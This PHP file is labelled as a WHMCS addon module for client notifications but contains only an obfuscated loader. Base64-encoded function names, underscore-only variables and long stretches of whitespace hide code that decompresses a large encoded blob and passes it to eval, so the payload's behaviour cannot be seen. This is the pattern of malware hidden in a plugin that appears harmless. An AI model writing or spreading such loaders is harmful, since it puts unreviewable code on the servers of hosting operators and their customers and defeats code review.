<?php 
/**
 * Notify-client-by-usbhost - WHMCS Addon Module
 *
 * @see https://github.com/usbhost-dev
 *
 * @license Free 
 */
        $__='printf';$_='Loading Class/Code NAME';
        































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltvozgUgN8j7X/Iw0h0NKMukGSmKMpDoIRwCWmgBdsvFdgpIeG2CyGBXz8mybRzeelouyvtyJ8Fxgefc+xzjB+Q+/0z7x4pE674O86qJ258al6YcEoSlOWfSk7WfXu6UPun9vX1NTfuXdT7f/RYefvS6/LQf0MmP0k4IEgl9IUYaeqEO4lesvoqLmtl0mcwGIzfEw6nHk+Asdc1T4T+ITdm0hNodp/PmybdNc/b9SMLFYPBYDAYDAaD8X+D/c5gMBiM3xcuDMr1p+EjWeOcrLkxiwiDwWAwGP+IHw4QxDd/mVEembG8DAdOgbJdBcVjgfwRb/nGyAJeC9NNjQeryHJl4KrC7UMjy0hz6jCW7VB0hFB7MHUl765oNbcT5Mo5mTsH3Oa1JZKCaBsBxqNtKPI1AXYcaFJLFGGHAHzR044FFL09Fh8iJzOojWknr5XMa9FXv8JRhcDZwHTWIu94C4HcEv+YLJupCX1nB8RNHYplbvB2GfjenqizBvkzPRSFBGuzDLm41G/VUteQEKY2H/jS3lQcEQKjNV35sxLtTMV1GgRsIZyvJF21N3hud/P7tMw6v8fEVMj+HKfk6WUuuLDuRy2iY4GDVW6Io5poyZb66+SDQPMa5EZZ4K8yS5keTZf/gNKkoTHNzfuy8zlcK1NJV559V3fpxUb33k9SOs7h+paXOtth+pCZgMpXdLxASEIa8/UhNxRgJGTuNWE8zehcjDvNKUgsb0Nt1uKWjyEdH85W0aWu8MDb0pi3uJEr634a322PuwDAiOZ/gwcLSc+MmjT6h5/siFJpAZvqqJ1OoWt2CYHd3rlGCn09QqlaEXFTwcHi9LwYRLTfoQ7uhzeWSG1thzdIS8Rv9OjaOFRY5KtFZzPGe2O+GVoxfu7/Q50t6XyfVnmkK9NIyfhieZhMuHGv999/SJNTfXVpvR//ivo3uq9RfPfi8Irr7tzHZ7fsvM+/e97n+xxcfZf0cwrej78A2RlGAw==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































                                                                                                                                                                                                                     $________;
